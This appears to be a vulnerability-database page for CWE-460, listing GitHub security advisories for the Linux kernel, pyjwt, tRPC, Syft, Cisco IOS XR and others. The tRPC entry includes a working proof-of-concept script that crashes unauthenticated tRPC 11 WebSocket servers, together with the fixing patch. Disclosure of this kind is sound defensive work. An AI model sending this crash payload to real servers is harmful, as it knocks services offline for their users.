CWE-460
AllowedImproper Cleanup on Thrown Exception
Abstraction: Base · Status: Draft
The product does not clean up its state or incorrectly cleans up its state when an exception is thrown, leading to unexpected state or control flow.
40 vulnerabilities reference this CWE, most recent first.
GHSA-CPH4-FPFM-5H8W
Vulnerability from github – Published: 2022-05-24 17:28 – Updated: 2022-07-26 00:01A memory disclosure flaw was found in the Linux kernel's ethernet drivers, in the way it read data from the EEPROM of the device. This flaw allows a local user to read uninitialized values from the kernel memory. The highest threat from this vulnerability is to confidentiality.
{
"affected": [],
"aliases": [
"CVE-2020-14304"
],
"database_specific": {
"cwe_ids": [
"CWE-460",
"CWE-755"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2020-09-15T20:15:00Z",
"severity": "MODERATE"
},
"details": "A memory disclosure flaw was found in the Linux kernel\u0027s ethernet drivers, in the way it read data from the EEPROM of the device. This flaw allows a local user to read uninitialized values from the kernel memory. The highest threat from this vulnerability is to confidentiality.",
"id": "GHSA-cph4-fpfm-5h8w",
"modified": "2022-07-26T00:01:10Z",
"published": "2022-05-24T17:28:18Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2020-14304"
},
{
"type": "WEB",
"url": "https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=960702"
},
{
"type": "WEB",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2020-14304"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N",
"type": "CVSS_V3"
}
]
}
GHSA-FHV5-28VV-H8M8
Vulnerability from github – Published: 2026-06-15 17:28 – Updated: 2026-06-15 17:28[!NOTE] The vulnerability surfaces only when a JWKS fetch fails; an attacker can attempt to provoke that with sustained unknown-kid traffic, but the outcome depends on upstream JWKS-endpoint behavior (rate limiting, transient errors) which is beyond the attacker's control. Impact is reduced auth availability until the next successful fetch, not complete denial of service.
Summary
PyJWKClient.get_signing_key() forces a fresh HTTP request to the JWKS endpoint for every JWT with an unknown kid value, with no rate limiting. Since kid comes from the unverified token header, an attacker can trigger unlimited outbound requests.
Additionally, fetch_data() finally block clears the JWKS cache on network error.
Root Cause
jwt/jwks_client.py:172-198 - get_signing_key(kid) calls get_signing_keys(refresh=True) for unknown kids, bypassing TTL cache with no cooldown. jwt/jwks_client.py:120-122 - finally block writes None to cache on error, clearing valid data.
Impact
- DoS against JWKS endpoint (unlimited requests per invalid token)
- DoS against application (network I/O latency)
- Cascading failure (rate limiting clears cache, breaking legitimate auth)
Suggested Fix
- Add refresh cooldown (refuse refresh more than once per TTL period)
- Move cache write from finally to else block
Affected Versions
All versions with PyJWKClient (2.4.0 through 2.12.1)
{
"affected": [
{
"database_specific": {
"last_known_affected_version_range": "\u003c= 2.12.1"
},
"package": {
"ecosystem": "PyPI",
"name": "pyjwt"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "2.13.0"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2026-48524"
],
"database_specific": {
"cwe_ids": [
"CWE-460",
"CWE-755"
],
"github_reviewed": true,
"github_reviewed_at": "2026-06-15T17:28:46Z",
"nvd_published_at": "2026-05-28T16:16:29Z",
"severity": "LOW"
},
"details": "\u003e [!NOTE]\n\u003e The vulnerability surfaces only when a JWKS fetch fails; an attacker can attempt to provoke that with sustained unknown-kid traffic, but the outcome depends on upstream JWKS-endpoint behavior (rate limiting, transient errors) which is beyond the attacker\u0027s control. Impact is reduced auth availability until the next successful fetch, not complete denial of service.\n\n## Summary\nPyJWKClient.get_signing_key() forces a fresh HTTP request to the JWKS endpoint for every JWT with an unknown kid value, with no rate limiting. Since kid comes from the unverified token header, an attacker can trigger unlimited outbound requests.\n\nAdditionally, fetch_data() finally block clears the JWKS cache on network error.\n\n## Root Cause\njwt/jwks_client.py:172-198 - get_signing_key(kid) calls get_signing_keys(refresh=True) for unknown kids, bypassing TTL cache with no cooldown.\njwt/jwks_client.py:120-122 - finally block writes None to cache on error, clearing valid data.\n\n## Impact\n- DoS against JWKS endpoint (unlimited requests per invalid token)\n- DoS against application (network I/O latency)\n- Cascading failure (rate limiting clears cache, breaking legitimate auth)\n\n## Suggested Fix\n1. Add refresh cooldown (refuse refresh more than once per TTL period)\n2. Move cache write from finally to else block\n\n## Affected Versions\nAll versions with PyJWKClient (2.4.0 through 2.12.1)",
"id": "GHSA-fhv5-28vv-h8m8",
"modified": "2026-06-15T17:28:46Z",
"published": "2026-06-15T17:28:46Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/jpadilla/pyjwt/security/advisories/GHSA-fhv5-28vv-h8m8"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-48524"
},
{
"type": "PACKAGE",
"url": "https://github.com/jpadilla/pyjwt"
},
{
"type": "WEB",
"url": "https://github.com/pypa/advisory-database/tree/main/vulns/pyjwt/PYSEC-2026-177.yaml"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:L",
"type": "CVSS_V3"
}
],
"summary": "PyJWKClient unbounded JWKS endpoint requests via attacker-controlled kid values (DoS)"
}
GHSA-FQ75-CVW3-5JX9
Vulnerability from github – Published: 2022-05-13 01:08 – Updated: 2022-05-13 01:08A flaw was found in the hugetlb_mcopy_atomic_pte function in mm/hugetlb.c in the Linux kernel before 4.13. A superfluous implicit page unlock for VM_SHARED hugetlbfs mapping could trigger a local denial of service (BUG).
{
"affected": [],
"aliases": [
"CVE-2017-15127"
],
"database_specific": {
"cwe_ids": [
"CWE-460"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2018-01-14T06:29:00Z",
"severity": "MODERATE"
},
"details": "A flaw was found in the hugetlb_mcopy_atomic_pte function in mm/hugetlb.c in the Linux kernel before 4.13. A superfluous implicit page unlock for VM_SHARED hugetlbfs mapping could trigger a local denial of service (BUG).",
"id": "GHSA-fq75-cvw3-5jx9",
"modified": "2022-05-13T01:08:47Z",
"published": "2022-05-13T01:08:47Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2017-15127"
},
{
"type": "WEB",
"url": "https://github.com/torvalds/linux/commit/5af10dfd0afc559bb4b0f7e3e8227a1578333995"
},
{
"type": "WEB",
"url": "https://access.redhat.com/errata/RHSA-2018:0676"
},
{
"type": "WEB",
"url": "https://access.redhat.com/errata/RHSA-2018:1062"
},
{
"type": "WEB",
"url": "https://access.redhat.com/security/cve/CVE-2017-15127"
},
{
"type": "WEB",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=1525218"
},
{
"type": "WEB",
"url": "http://git.kernel.org/cgit/linux/kernel/git/torvalds/linux.git/commit/?id=5af10dfd0afc559bb4b0f7e3e8227a1578333995"
},
{
"type": "WEB",
"url": "http://www.securityfocus.com/bid/102517"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"type": "CVSS_V3"
}
]
}
GHSA-PCWC-3RJ4-GJ54
Vulnerability from github – Published: 2023-03-07 00:30 – Updated: 2025-03-07 18:30A double-free memory flaw was found in the Linux kernel. The Intel GVT-g graphics driver triggers VGA card system resource overload, causing a fail in the intel_gvt_dma_map_guest_page function. This issue could allow a local user to crash the system.
{
"affected": [],
"aliases": [
"CVE-2022-3707"
],
"database_specific": {
"cwe_ids": [
"CWE-415",
"CWE-460"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2023-03-06T23:15:00Z",
"severity": "MODERATE"
},
"details": "A double-free memory flaw was found in the Linux kernel. The Intel GVT-g graphics driver triggers VGA card system resource overload, causing a fail in the intel_gvt_dma_map_guest_page function. This issue could allow a local user to crash the system.",
"id": "GHSA-pcwc-3rj4-gj54",
"modified": "2025-03-07T18:30:58Z",
"published": "2023-03-07T00:30:25Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2022-3707"
},
{
"type": "WEB",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2137979"
},
{
"type": "WEB",
"url": "https://lists.debian.org/debian-lts-announce/2023/05/msg00005.html"
},
{
"type": "WEB",
"url": "https://lists.debian.org/debian-lts-announce/2023/05/msg00006.html"
},
{
"type": "WEB",
"url": "https://lore.kernel.org/all/20221007013708.1946061-1-zyytlz.wz%40163.com"
},
{
"type": "WEB",
"url": "https://lore.kernel.org/all/20221007013708.1946061-1-zyytlz.wz@163.com"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"type": "CVSS_V3"
}
]
}
GHSA-PJ3V-9CM8-GVJ8
Vulnerability from github – Published: 2025-04-24 16:03 – Updated: 2025-04-24 16:03Summary
An unhandled error is thrown when validating invalid connectionParams which crashes a tRPC WebSocket server. This allows any unauthenticated user to crash a tRPC 11 WebSocket server.
Details
Any tRPC 11 server with WebSocket enabled with a createContext method set is vulnerable. Here is an example:
https://github.com/user-attachments/assets/ce1b2d32-6103-4e54-8446-51535b293b05
I have a working reproduction here if you would like to test: https://github.com/lukechilds/trpc-vuln-reproduction
The connectionParams logic introduced in https://github.com/trpc/trpc/pull/5839 does not safely handle invalid connectionParams objects. During validation if the object does not match an expected shape an error will be thrown:
https://github.com/trpc/trpc/blob/8cef54eaf95d8abc8484fe1d454b6620eeb57f2f/packages/server/src/unstable-core-do-not-import/http/parseConnectionParams.ts#L27-L33
This is called during WebSocket connection setup inside createCtxPromise() here:
https://github.com/trpc/trpc/blob/8cef54eaf95d8abc8484fe1d454b6620eeb57f2f/packages/server/src/adapters/ws.ts#L435
createCtxPromise has handling to catch any errors and pass them up to the opts.onError handler:
https://github.com/trpc/trpc/blob/8cef54eaf95d8abc8484fe1d454b6620eeb57f2f/packages/server/src/adapters/ws.ts#L144-L173
However the error handler then rethrows the error:
https://github.com/trpc/trpc/blob/8cef54eaf95d8abc8484fe1d454b6620eeb57f2f/packages/server/src/adapters/ws.ts#L171
Since this is all triggered from the WebSocket message event there is no higher level error handling so this causes an uncaught exception and crashes the server process.
This means any tRPC 11 server with WebSockets enabled can be crashed by an attacker sending an invalid connectionParams object. It doesn't matter if the server doesn't make user of connectionParams, the connectionParams logic can be initiated by the client.
To fix this vulnerability tRPC should not rethrow the error after it's be handled. This patch fixes the vulnerability:
From 5747b1d11946f60268eb86c59784bd6f7eb50abd Mon Sep 17 00:00:00 2001
From: Luke Childs <lukechilds123@gmail.com>
Date: Sun, 20 Apr 2025 13:27:10 +0700
Subject: [PATCH] Don't throw already handled error
This error has already been handled so no need to re-throw. If we re-throw it will not be caught and will trigger an uncaught exception causing the entire server process to crash.
---
packages/server/src/adapters/ws.ts | 2 --
1 file changed, 2 deletions(-)
diff --git a/packages/server/src/adapters/ws.ts b/packages/server/src/adapters/ws.ts
index ad869affd..5a578b5cb 100644
--- a/packages/server/src/adapters/ws.ts
+++ b/packages/server/src/adapters/ws.ts
@@ -167,8 +167,6 @@ export function getWSConnectionHandler<TRouter extends AnyRouter>(
(globalThis.setImmediate ?? globalThis.setTimeout)(() => {
client.close();
});
-
- throw error;
});
}
--
2.48.1
PoC
This script will crash the target tRPC 11 server if WebSockets are enabled:
#!/usr/bin/env node
const TARGET = 'ws://localhost:3000'
// These malicious connection params will crash any tRPC v11.1.0 WebSocket server on validation
const MALICIOUS_CONNECTION_PARAMS = JSON.stringify({
method: "connectionParams",
data: { invalidConnectionParams: null },
});
// Open a connection to the target
const target = `${TARGET}?connectionParams=1`;
console.log(`Opening a WebSocket to ${target}`);
const socket = new WebSocket(target);
// Wait for the connection to be established
socket.addEventListener("open", () => {
console.log("WebSocket established!");
// Sends a message to the WebSocket server.
console.log(`Sending malicious connectionParams`);
socket.send(MALICIOUS_CONNECTION_PARAMS);
console.log(`Done!`);
});
// Handle errors
socket.addEventListener("error", () => console.log("Error opening WebSocket"));
Complete PoC with vulnerable WebSocket server here: https://github.com/lukechilds/trpc-vuln-reproduction
{
"affected": [
{
"package": {
"ecosystem": "npm",
"name": "@trpc/server"
},
"ranges": [
{
"events": [
{
"introduced": "11.0.0"
},
{
"fixed": "11.1.1"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2025-43855"
],
"database_specific": {
"cwe_ids": [
"CWE-248",
"CWE-460"
],
"github_reviewed": true,
"github_reviewed_at": "2025-04-24T16:03:57Z",
"nvd_published_at": "2025-04-24T14:15:59Z",
"severity": "HIGH"
},
"details": "### Summary\n\nAn unhandled error is thrown when validating invalid connectionParams which crashes a tRPC WebSocket server. This allows any unauthenticated user to crash a tRPC 11 WebSocket server.\n\n### Details\nAny tRPC 11 server with WebSocket enabled with a `createContext` method set is vulnerable. Here is an example:\n\nhttps://github.com/user-attachments/assets/ce1b2d32-6103-4e54-8446-51535b293b05\n\nI have a working reproduction here if you would like to test: https://github.com/lukechilds/trpc-vuln-reproduction\n\nThe connectionParams logic introduced in https://github.com/trpc/trpc/pull/5839 does not safely handle invalid connectionParams objects. During validation if the object does not match an expected shape an error will be thrown:\n\nhttps://github.com/trpc/trpc/blob/8cef54eaf95d8abc8484fe1d454b6620eeb57f2f/packages/server/src/unstable-core-do-not-import/http/parseConnectionParams.ts#L27-L33\n\nThis is called during WebSocket connection setup inside `createCtxPromise()` here:\n\nhttps://github.com/trpc/trpc/blob/8cef54eaf95d8abc8484fe1d454b6620eeb57f2f/packages/server/src/adapters/ws.ts#L435\n\n`createCtxPromise` has handling to catch any errors and pass them up to the `opts.onError` handler:\n\nhttps://github.com/trpc/trpc/blob/8cef54eaf95d8abc8484fe1d454b6620eeb57f2f/packages/server/src/adapters/ws.ts#L144-L173\n\nHowever the error handler then rethrows the error:\n\nhttps://github.com/trpc/trpc/blob/8cef54eaf95d8abc8484fe1d454b6620eeb57f2f/packages/server/src/adapters/ws.ts#L171\n\nSince this is all triggered from the WebSocket `message` event there is no higher level error handling so this causes an uncaught exception and crashes the server process.\n\nThis means any tRPC 11 server with WebSockets enabled can be crashed by an attacker sending an invalid connectionParams object. It doesn\u0027t matter if the server doesn\u0027t make user of connectionParams, the connectionParams logic can be initiated by the client.\n\nTo fix this vulnerability tRPC should not rethrow the error after it\u0027s be handled. This patch fixes the vulnerability:\n\n```patch\nFrom 5747b1d11946f60268eb86c59784bd6f7eb50abd Mon Sep 17 00:00:00 2001\nFrom: Luke Childs \u003clukechilds123@gmail.com\u003e\nDate: Sun, 20 Apr 2025 13:27:10 +0700\nSubject: [PATCH] Don\u0027t throw already handled error\n\nThis error has already been handled so no need to re-throw. If we re-throw it will not be caught and will trigger an uncaught exception causing the entire server process to crash.\n---\n packages/server/src/adapters/ws.ts | 2 --\n 1 file changed, 2 deletions(-)\n\ndiff --git a/packages/server/src/adapters/ws.ts b/packages/server/src/adapters/ws.ts\nindex ad869affd..5a578b5cb 100644\n--- a/packages/server/src/adapters/ws.ts\n+++ b/packages/server/src/adapters/ws.ts\n@@ -167,8 +167,6 @@ export function getWSConnectionHandler\u003cTRouter extends AnyRouter\u003e(\n (globalThis.setImmediate ?? globalThis.setTimeout)(() =\u003e {\n client.close();\n });\n-\n- throw error;\n });\n }\n\n--\n2.48.1\n\n```\n\n## PoC\n\nThis script will crash the target tRPC 11 server if WebSockets are enabled:\n\n```js\n#!/usr/bin/env node\n\nconst TARGET = \u0027ws://localhost:3000\u0027\n\n// These malicious connection params will crash any tRPC v11.1.0 WebSocket server on validation\nconst MALICIOUS_CONNECTION_PARAMS = JSON.stringify({\n method: \"connectionParams\",\n data: { invalidConnectionParams: null },\n});\n\n// Open a connection to the target\nconst target = `${TARGET}?connectionParams=1`;\nconsole.log(`Opening a WebSocket to ${target}`);\nconst socket = new WebSocket(target);\n\n// Wait for the connection to be established\nsocket.addEventListener(\"open\", () =\u003e {\n console.log(\"WebSocket established!\");\n\n // Sends a message to the WebSocket server.\n console.log(`Sending malicious connectionParams`);\n socket.send(MALICIOUS_CONNECTION_PARAMS);\n console.log(`Done!`);\n});\n\n// Handle errors\nsocket.addEventListener(\"error\", () =\u003e console.log(\"Error opening WebSocket\"));\n```\n\nComplete PoC with vulnerable WebSocket server here: https://github.com/lukechilds/trpc-vuln-reproduction",
"id": "GHSA-pj3v-9cm8-gvj8",
"modified": "2025-04-24T16:03:58Z",
"published": "2025-04-24T16:03:57Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/trpc/trpc/security/advisories/GHSA-pj3v-9cm8-gvj8"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-43855"
},
{
"type": "WEB",
"url": "https://github.com/trpc/trpc/pull/5839"
},
{
"type": "WEB",
"url": "https://github.com/trpc/trpc/commit/9beb26c636d44852e0f407f3d7a82ad54df65b4d"
},
{
"type": "PACKAGE",
"url": "https://github.com/trpc/trpc"
},
{
"type": "WEB",
"url": "https://github.com/trpc/trpc/blob/8cef54eaf95d8abc8484fe1d454b6620eeb57f2f/packages/server/src/adapters/ws.ts#L171"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N",
"type": "CVSS_V4"
}
],
"summary": "tRPC 11 WebSocket DoS Vulnerability"
}
GHSA-QQ29-5VJH-VXWR
Vulnerability from github – Published: 2022-09-27 00:00 – Updated: 2024-10-25 21:29rdiffweb prior to version 2.4.8 is vulnerable to Improper Cleanup on Thrown Exception. This could allow an attacker to display a message of their choice onto a web page. Version 2.4.8 contains a fix for this issue.
{
"affected": [
{
"package": {
"ecosystem": "PyPI",
"name": "rdiffweb"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "2.4.8"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2022-3301"
],
"database_specific": {
"cwe_ids": [
"CWE-460"
],
"github_reviewed": true,
"github_reviewed_at": "2022-09-30T04:44:55Z",
"nvd_published_at": "2022-09-26T11:15:00Z",
"severity": "MODERATE"
},
"details": "rdiffweb prior to version 2.4.8 is vulnerable to Improper Cleanup on Thrown Exception. This could allow an attacker to display a message of their choice onto a web page. Version 2.4.8 contains a fix for this issue.",
"id": "GHSA-qq29-5vjh-vxwr",
"modified": "2024-10-25T21:29:58Z",
"published": "2022-09-27T00:00:22Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2022-3301"
},
{
"type": "WEB",
"url": "https://github.com/ikus060/rdiffweb/commit/5ac38b2a75becbab9f948bd5e37ecbcd9f0b362e"
},
{
"type": "PACKAGE",
"url": "https://github.com/ikus060/rdiffweb"
},
{
"type": "WEB",
"url": "https://github.com/pypa/advisory-database/tree/main/vulns/rdiffweb/PYSEC-2022-295.yaml"
},
{
"type": "WEB",
"url": "https://huntr.dev/bounties/d3bf1e5d-055a-44b8-8d60-54ab966ed63a"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:U/C:N/I:L/A:N",
"type": "CVSS_V3"
},
{
"score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:P/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N",
"type": "CVSS_V4"
}
],
"summary": "rdiffweb vulnerable to Improper Cleanup on Thrown Exception"
}
GHSA-RJCW-VG7J-M9RC
Vulnerability from github – Published: 2026-03-20 20:46 – Updated: 2026-03-27 20:58Impact
Syft versions before v1.42.3 would not properly cleanup temporary storage if the temporary storage was exhausted during a scan. When scanning archives Syft will unpack those archives into temporary storage then inspect the unpacked contents. Under normal operation Syft will remove the temporary data it writes after completing a scan.
This vulnerability would affect users of Syft that were scanning content that could cause Syft to fill the temporary storage that would then cause Syft to raise an error and exit. When the error is triggered Syft would exit without properly removing the temporary files in use. In our testing this was most easily reproduced by scanning very large artifacts or highly compressed artifacts such as a zipbomb.
Because Syft would not clean up its temporary files, the result would be filling temporary file storage preventing future runs of Syft or other system utilities that rely on temporary storage being available.
Patches
The patch has been released in v1.42.3
Syft now cleans up temporary files when an error condition is encountered.
Workarounds
There are no workarounds for this vulnerability in Syft. Users that find their temporary storage depleted can manually remove the temporary files.
{
"affected": [
{
"package": {
"ecosystem": "Go",
"name": "github.com/anchore/syft"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "1.42.3"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2026-33481"
],
"database_specific": {
"cwe_ids": [
"CWE-460"
],
"github_reviewed": true,
"github_reviewed_at": "2026-03-20T20:46:29Z",
"nvd_published_at": "2026-03-26T18:16:29Z",
"severity": "MODERATE"
},
"details": "### Impact\nSyft versions before v1.42.3 would not properly cleanup temporary storage if the temporary storage was exhausted during a scan. When scanning archives Syft will unpack those archives into temporary storage then inspect the unpacked contents. Under normal operation Syft will remove the temporary data it writes after completing a scan.\n\nThis vulnerability would affect users of Syft that were scanning content that could cause Syft to fill the temporary storage that would then cause Syft to raise an error and exit. When the error is triggered Syft would exit without properly removing the temporary files in use. In our testing this was most easily reproduced by scanning very large artifacts or highly compressed artifacts such as a zipbomb.\n\nBecause Syft would not clean up its temporary files, the result would be filling temporary file storage preventing future runs of Syft or other system utilities that rely on temporary storage being available.\n\n### Patches\n\nThe patch has been released in v1.42.3\n\nSyft now cleans up temporary files when an error condition is encountered.\n\n### Workarounds\n\nThere are no workarounds for this vulnerability in Syft. Users that find their temporary storage depleted can manually remove the temporary files.",
"id": "GHSA-rjcw-vg7j-m9rc",
"modified": "2026-03-27T20:58:13Z",
"published": "2026-03-20T20:46:29Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/anchore/syft/security/advisories/GHSA-rjcw-vg7j-m9rc"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-33481"
},
{
"type": "WEB",
"url": "https://github.com/anchore/stereoscope/pull/537"
},
{
"type": "WEB",
"url": "https://github.com/anchore/syft/pull/4629"
},
{
"type": "WEB",
"url": "https://github.com/anchore/syft/pull/4668"
},
{
"type": "PACKAGE",
"url": "https://github.com/anchore/syft"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L",
"type": "CVSS_V3"
}
],
"summary": "Syft improper temporary file cleanup"
}
GHSA-VGPF-3M99-Q785
Vulnerability from github – Published: 2026-03-11 18:30 – Updated: 2026-03-11 18:30A vulnerability in the handling of an Egress Packet Network Interface (EPNI) Aligner interrupt in Cisco IOS XR Software for Cisco Network Convergence System (NCS) 5500 Series with NC57 line cards and Cisco NCS 5700 Routers and Cisco IOS XR Software for Third Party Software could allow an unauthenticated, remote attacker to cause the network processing unit (NPU) and ASIC to stop processing, preventing traffic from traversing the interface.
This vulnerability is due to the corruption of packets in specific cases when an EPNI Aligner interrupt is triggered while an affected device is experiencing heavy transit traffic. An attacker could exploit this vulnerability by sending a continuous flow of crafted packets to an interface of the affected device. A successful exploit could allow the attacker to cause persistent, heavy packet loss, resulting in a denial of service (DoS) condition. Note: If active exploitation of this vulnerability is suspected, contact the Cisco Technical Assistance Center (TAC) or your contracted maintenance provider. Cisco has assigned this security advisory a Security Impact Rating (SIR) of High rather than Medium as the score indicates. This change was made because the affected device operates within a critical network segment where compromise could lead to significant disruption or exposure, thereby elevating the overall risk beyond the base technical severity.
{
"affected": [],
"aliases": [
"CVE-2026-20118"
],
"database_specific": {
"cwe_ids": [
"CWE-460"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2026-03-11T17:16:56Z",
"severity": "MODERATE"
},
"details": "A vulnerability in the handling of an Egress Packet Network Interface (EPNI) Aligner interrupt in Cisco IOS XR Software for Cisco Network Convergence System (NCS) 5500 Series with NC57 line cards and Cisco NCS 5700 Routers and Cisco IOS XR Software for Third Party Software could allow an unauthenticated, remote attacker to cause the network processing unit (NPU) and ASIC to stop processing, preventing traffic from traversing the interface.\n\nThis vulnerability is due to the corruption of packets in specific cases when an EPNI Aligner interrupt is triggered while an affected device is experiencing heavy transit traffic. An attacker could exploit this vulnerability by sending a continuous flow of crafted packets to an interface of the affected device. A successful exploit could allow the attacker to cause persistent, heavy packet loss, resulting in a denial of service (DoS) condition.\nNote: If active exploitation of this vulnerability is suspected, contact the Cisco Technical Assistance Center (TAC) or your contracted maintenance provider.\nCisco has assigned this security advisory a Security Impact Rating (SIR) of High rather than Medium as the score indicates. This change was made because the affected device operates within a critical network segment where compromise could lead to significant disruption or exposure, thereby elevating the overall risk beyond the base technical severity.",
"id": "GHSA-vgpf-3m99-q785",
"modified": "2026-03-11T18:30:33Z",
"published": "2026-03-11T18:30:33Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-20118"
},
{
"type": "WEB",
"url": "https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-xrncs-epni-int-dos-TWMffUsN"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:N/I:N/A:H",
"type": "CVSS_V3"
}
]
}
GHSA-X93Q-CW8X-XCFQ
Vulnerability from github – Published: 2025-09-15 21:30 – Updated: 2025-09-15 21:30libocpp before 0.28.0 allows a denial of service (EVerest crash) because a secondary exception is thrown during error message generation.
{
"affected": [],
"aliases": [
"CVE-2025-59399"
],
"database_specific": {
"cwe_ids": [
"CWE-460"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2025-09-15T19:15:36Z",
"severity": "LOW"
},
"details": "libocpp before 0.28.0 allows a denial of service (EVerest crash) because a secondary exception is thrown during error message generation.",
"id": "GHSA-x93q-cw8x-xcfq",
"modified": "2025-09-15T21:30:56Z",
"published": "2025-09-15T21:30:56Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-59399"
},
{
"type": "WEB",
"url": "https://github.com/EVerest/libocpp/commit/0b84d7f9fb3c338d470770f220a7b7f21db78878"
},
{
"type": "WEB",
"url": "https://github.com/EVerest/libocpp/compare/v0.27.1...v0.28.0"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:A/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:L",
"type": "CVSS_V3"
}
]
}
GHSA-XX83-CXMQ-X89M
Vulnerability from github – Published: 2024-12-13 00:30 – Updated: 2025-12-31 22:00Boundary Community Edition and Boundary Enterprise (“Boundary”) incorrectly handle HTTP requests during the initialization of the Boundary controller, which may cause the Boundary server to terminate prematurely. Boundary is only vulnerable to this flaw during the initialization of the Boundary controller, which on average is measured in milliseconds during the Boundary startup process.
This vulnerability, CVE-2024-12289, is fixed in Boundary Community Edition and Boundary Enterprise 0.16.4, 0.17.3, 0.18.2.
{
"affected": [
{
"package": {
"ecosystem": "Go",
"name": "github.com/hashicorp/boundary"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "0.18.2"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2024-12289"
],
"database_specific": {
"cwe_ids": [
"CWE-460",
"CWE-665"
],
"github_reviewed": true,
"github_reviewed_at": "2024-12-13T20:37:17Z",
"nvd_published_at": "2024-12-12T23:15:10Z",
"severity": "MODERATE"
},
"details": "Boundary Community Edition and Boundary Enterprise (\u201cBoundary\u201d) incorrectly handle HTTP requests during the initialization of the Boundary controller, which may cause the Boundary server to terminate prematurely. Boundary is only vulnerable to this flaw during the initialization of the Boundary controller, which on average is measured in milliseconds during the Boundary startup process.\n\nThis vulnerability, CVE-2024-12289, is fixed in Boundary Community Edition and Boundary Enterprise 0.16.4, 0.17.3, 0.18.2.",
"id": "GHSA-xx83-cxmq-x89m",
"modified": "2025-12-31T22:00:42Z",
"published": "2024-12-13T00:30:50Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2024-12289"
},
{
"type": "WEB",
"url": "https://discuss.hashicorp.com/t/hcsec-2024-28-boundary-controller-incorrectly-handles-http-requests-on-initialization-which-may-lead-to-a-denial-of-service"
},
{
"type": "PACKAGE",
"url": "https://github.com/hashicorp/boundary"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H",
"type": "CVSS_V3"
}
],
"summary": "Boundary Community Edition Incorrectly Handles HTTP Requests On Initialization Which May Lead to a Denial of Service"
}
Mitigation
If one breaks from a loop or function by throwing an exception, make sure that cleanup happens or that you should exit the program. Use throwing exceptions sparsely.
No CAPEC attack patterns related to this CWE.